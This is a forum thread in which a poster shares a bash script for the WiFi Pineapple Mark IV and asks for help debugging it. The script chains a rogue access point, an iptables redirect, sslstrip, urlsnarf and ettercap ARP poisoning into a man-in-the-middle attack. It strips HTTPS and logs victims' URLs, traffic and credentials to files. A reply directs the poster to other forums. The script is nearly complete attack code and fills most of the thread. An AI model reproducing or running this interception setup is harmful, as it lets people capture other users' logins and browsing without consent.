Jump to content

Wifi Pineapple And Sslstrip

dwek

By dwek
in WiFi Pineapple Mark IV

 Share

Recommended Posts

dwek Newbie

dwek

Posted
Posted

Hi,

I'm working on a script to leverage the standard WP4.sh script for the Pineapple IV, combined with a MITM SSLstip script.

The below is sort of working , but I have issues with the first iptables statement forwarding properly and how URLsnarf & SSLstrip are being passed traffic.

I'm also thinking that excluding ARP poisoning the Pineapple might be a good idea,.

Any thoughts?

It's probably something obvious or just my lack of looking.

Either way, I thought I would share what I have got so far.

Thanks

#!/bin/bash

#This script combines the Wireless Pinapple (wp4.sh) and the MITM script v1.0 beta found at

#http://360percents.com/posts/automatic-mitm-shell-script/

#define variables

echo -n "Input Pineapple Netmask [or ENTER for 255.255.255.0]: "

read pineapplenetmask

if [[ $pineapplenetmask == '' ]]; then

pineapplenetmask=255.255.255.0 #Default netmask for /24 network

fi

echo -n "Input Pineapple Network [or ENTER for 172.16.42.0/24]: "

read pineapplenet

if [[ $pineapplenet == '' ]]; then

pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24

pineapplerange=172.16.42.2-254 # Pineapple network. Default is 172.16.42.2-254 excluding the Pinapple IP

fi

if [[ $pineapplenet != '172.16.42.0/24' ]]; then

pineapplerange=$pineapplenet # If default 172.16.42.0/24 is not selected, provide reduced target scope to ettercap

fi

echo -n "Input Interface between PC and Pineapple [or ENTER for eth0]: "

read pineapplelan

if [[ $pineapplelan == '' ]]; then

pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple

fi

echo -n "Input Interface between PC and Internet [or ENTER for wlan0]: "

read pineapplewan

if [[ $pineapplewan == '' ]]; then

pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan

fi

temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default

echo -n "Input Internet Gateway [or ENTER for $temppineapplegw]: "

read pineapplegw

if [[ $pineapplegw == '' ]]; then

pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default

fi

echo -n "Input IP Address of Host PC [or ENTER for 172.16.42.42]: "

read pineapplehostip

if [[ $pineapplehostip == '' ]]; then

pineapplehostip=172.16.42.42 #IP Address of host computer

fi

echo -n "Input IP Address of Pineapple [or ENTER for 172.16.42.1]: "

read pineappleip

if [[ $pineappleip == '' ]]; then

pineappleip=172.16.42.1 #Thanks Douglas Adams

fi

#Display settings

echo Pineapple connected to: $pineapplelan

echo Internet connection from: $pineapplewan

echo Internet connection gateway: $pineapplegw

echo Host Computer IP: $pineapplehostip

echo Pineapple IP: $pineappleip

echo Network: $pineapplenet

echo Netmask: $pineapplenetmask

#Bring up Ethernet Interface directly connected to Pineapple

ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up

# Enable IP Forwarding

echo '1' > /proc/sys/net/ipv4/ip_forward

echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "

cat /proc/sys/net/ipv4/ip_forward

#clear chains and rules

iptables -X

iptables -F

echo iptables chains and rules cleared

#setup IP forwarding

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -j ACCEPT

iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT

iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

iptables -A POSTROUTING -t nat -j MASQUERADE

echo IP Forwarding Enabled

#remove default route

route del default

echo Default route removed

#add default gateway

route add default gw $pineapplegw $pineapplewan

echo Pineapple Default Gateway Configured

#create directory to store session results

echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "

read -e SESSION

mkdir /root/$SESSION/

# Sslstrip

echo "[+] Starting sslstrip"

xterm -geometry 75x15+1+200 -T sslstrip -e /pentest/web/sslstrip/sslstrip.py -f -s -k -w /root/$SESSION/$SESSION.log &

sleep 2

# urlsnarf

echo "[+] Starting urlsnarf"

urlsnarf -i $pineapplelan | grep http > /root/$SESSION/$SESSION.txt &

sleep 1

# Ettercap

echo ""

echo "[+] Starting ettercap"

xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $pineapplelan -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$pineappleip"/ /"$pineapplerange"/ &

cat /proc/sys/net/ipv4/ip_forward

iptables -t nat -L

sleep 1

#instructions

#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan

ping -c3 $pineappleip

if [ $? -eq 0 ]; then

echo ""

echo "ICS configuration successful."

#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"

#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"

#echo "Enter Pineapple password if prompted"

#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'

fi

echo ""

echo "Browse to http://$pineappleip/pineapple -- Happy Hacking!"

echo ""

echo ""

echo "[+] IMPORTANT"

echo -n "After you have finished please close this script and clean up properly by hitting y "

echo ""

echo ""

read WISH

echo ""

# Clean up sslstrip, ettercap and urlsnarf

if [ $WISH = "y" ]; then

echo ""

echo "[+] Cleaning up and resetting iptables..."

killall sslstrip

killall ettercap

killall urlsnarf

killall xterm

echo "0" > /proc/sys/net/ipv4/ip_forward

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

etterlog -p -i /root/$SESSION/$SESSION.eci

echo "[+] Clean up successful...Bye!"

exit

fi

exit

Link to comment
Share on other sites
dwek Newbie

dwek

Posted
  • Author
Posted

I'm now thinking that it may just be easier to write something that uses urlsnarf, sslstrip and ettercap on the Pineapple.

As the Pineapple is a fake AP, I won't need to use any ARP poisoning.

Anyone know of anything around?

I'm assuming this will also need some port forwarding on for sslstrip to work properly.

Link to comment
Share on other sites
  • 3 weeks later...
telot Newbie

telot

Posted
Posted

Hop on the Jasager forums for more responses! Thats where the pineapple community lives and thrives. We're waist-deep in discussions about ettercap, and theres plenty of threads about sslstrip (I made a nice how-to without ARP) so I think this topic would be especially welcome. Thanks!

telot

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...